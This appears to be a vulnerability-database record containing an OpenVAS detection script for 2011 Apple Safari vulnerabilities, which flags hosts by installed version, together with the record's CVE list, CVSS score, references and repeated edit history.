ID OPENVAS:1361412562310902543 Type openvas Reporter Copyright (C) 2011 SecPod Modified 2018-10-20T00:00:00
Description
The host is installed with Apple Safari web browser and is prone
to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_apple_safari_mult_vuln_july11.nasl 11997 2018-10-20 11:59:41Z mmartin $
#
# Apple Safari Multiple Vulnerabilities - July 2011
#
# Authors:
# Sooraj KS <kssooraj@secpod.com>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902543");
script_version("$Revision: 11997 $");
script_tag(name:"last_modification", value:"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $");
script_tag(name:"creation_date", value:"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)");
script_cve_id("CVE-2010-1383", "CVE-2010-1420", "CVE-2011-0214", "CVE-2011-0215",
"CVE-2011-0216", "CVE-2011-0217", "CVE-2011-0218", "CVE-2011-0219",
"CVE-2011-0221", "CVE-2011-0222", "CVE-2011-0223", "CVE-2011-0225",
"CVE-2011-0232", "CVE-2011-0233", "CVE-2011-0234", "CVE-2011-0235",
"CVE-2011-0237", "CVE-2011-0238", "CVE-2011-0240", "CVE-2011-0241",
"CVE-2011-0242", "CVE-2011-0244", "CVE-2011-0253", "CVE-2011-0254",
"CVE-2011-0255", "CVE-2011-1288", "CVE-2011-1453", "CVE-2011-1457",
"CVE-2011-1462", "CVE-2011-1774", "CVE-2011-1797", "CVE-2011-3443");
script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,
48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,
48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,
48857, 48858, 48859, 51035);
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("Apple Safari Multiple Vulnerabilities - July 2011");
script_xref(name:"URL", value:"http://support.apple.com/kb/HT4808");
script_xref(name:"URL", value:"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html");
script_tag(name:"qod_type", value:"registry");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2011 SecPod");
script_family("General");
script_dependencies("secpod_apple_safari_detect_win_900003.nasl");
script_mandatory_keys("AppleSafari/Version");
script_tag(name:"impact", value:"Successful exploitation may result in information disclosure, remote code
execution, denial of service, or other consequences.");
script_tag(name:"affected", value:"Apple Safari versions prior to 5.1");
script_tag(name:"insight", value:"For more details about the vulnerabilities refer the reference section.");
script_tag(name:"solution", value:"Upgrade to Apple Safari version 5.1 or later.");
script_tag(name:"summary", value:"The host is installed with Apple Safari web browser and is prone
to multiple vulnerabilities.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www.apple.com/safari/download/");
exit(0);
}
include("version_func.inc");
safVer = get_kb_item("AppleSafari/Version");
if(!safVer){
exit(0);
}
if(version_is_less(version:safVer, test_version:"5.34.50.0")){
security_message( port: 0, data: "The target host was found to be vulnerable" );
}
{"id": "OPENVAS:1361412562310902543", "bulletinFamily": "scanner", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "published": "2011-07-27T00:00:00", "modified": "2018-10-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "reporter": "Copyright (C) 2011 SecPod", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html", "http://www.apple.com/safari/download/"], "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "type": "openvas", "lastseen": "2018-10-22T16:44:44", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5826769ff119f40f7dace76723839a86da0999c2b5386a49f1d858c87406f08f", "hashmap": [{"hash": "cd0ec910fd929fe7e9ef7465128ff40f", "key": "sourceData"}, {"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "22c435fa8c42ad263fdea78451c188f0", "key": "modified"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-09-24T18:20:47", "modified": "2018-09-22T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 11552 2018-09-22 13:45:08Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 11552 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-22 15:45:08 +0200 (Sat, 22 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.1\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer the reference section.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\");\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 4, "lastseen": "2018-09-24T18:20:47"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "897bb553b884f4f4b2caf5d85911ecbee9bac93a8dd8ee3280f3f1117c3b8448", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-09-02T00:03:45", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:03:45"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "897bb553b884f4f4b2caf5d85911ecbee9bac93a8dd8ee3280f3f1117c3b8448", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-04-06T11:35:12", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-04-06T11:35:12"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ea683f9779d45ade00409d0aa2dc5b505fedd9c60280d3a052a21251e4aa1ee7", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-08-30T19:27:30", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 